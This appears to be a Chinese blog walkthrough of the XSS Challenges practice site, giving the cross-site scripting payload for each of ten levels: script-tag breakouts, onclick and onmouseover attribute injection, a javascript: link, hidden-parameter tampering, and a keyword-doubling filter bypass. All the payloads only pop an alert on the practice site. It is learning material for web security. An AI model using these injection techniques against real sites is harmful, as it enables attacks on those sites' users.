XSS Challenges练习方法

Posted 慕書

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了XSS Challenges练习方法相关的知识,希望对你有一定的参考价值。

XSS Challenges练习方法

网站练习地址:https://xss-quiz.int21h.jp/

第一关

  1. 输入 123,查看到渗透点
    在这里插入图片描述
  2. 输入:"</b><script>alert(document.domain);</script>,结果成功
    在这里插入图片描述

第二关

  1. 输入:123
    在这里插入图片描述
  2. 输入:"><script>alert(document.domain);</script>
    在这里插入图片描述

第三关

  1. 输入:123,再输入:</b><script>alert(document.domain);</script>
    在这里插入图片描述
  2. 使用抓包软件,BP,更改P2参数为:<script>alert(document.domain);</script>
    在这里插入图片描述
  3. 成功进行XSS
    在这里插入图片描述

第四关

  1. 抓包看见三个参数,输入一些XSS发现无情况,但发现有三个参数:p1=123&p2=Japan&p3=hackme
    在这里插入图片描述
  2. 找到 p3的参数
    在这里插入图片描述
  3. 发现隐藏的参数P3容易进行XSS,改变p3的参数,输入如下:"><script>alert(document.domain);</script>
    在这里插入图片描述

第五关

  1. 输入:123,发现框框的参数有输入限制,可进行更改,直接更改。
    在这里插入图片描述
  2. 输入:"><script>alert(document.domain);</script>
    在这里插入图片描述

第六关

  1. 输入:"><script>alert(document.domain);</script>,发现被转义了
    在这里插入图片描述

  2. 两种方法
    输入:"onclick="alert(document.domain)
    输入:"onmouseover="alert(document.domain)
    在这里插入图片描述
    在这里插入图片描述

第七关

  1. 输入:test onmouseover=alert(document.domain) 或者 test onclick=alert(document.domain)
    在这里插入图片描述

第八关

  1. 记住一句话,a标签用下面这个,输入:javascript:alert(document.domain)
    在这里插入图片描述

第九关

  1. 这个关卡,其他网友给得意见是使用IE浏览器,对环境有要求,先跳过,后台使用:alert(document.domain);可以直接跳过

在这里插入图片描述

第十关

  1. 输入:" onclick="alert(document.dodomainmain)
    在这里插入图片描述

以上是关于XSS Challenges练习方法的主要内容,如果未能解决你的问题,请参考以下文章

XSS Challenges练习方法

XSS练习平台XSS Challenges

XSS Challenges

XSS Challenges

XSS Challenges

XSS Challenges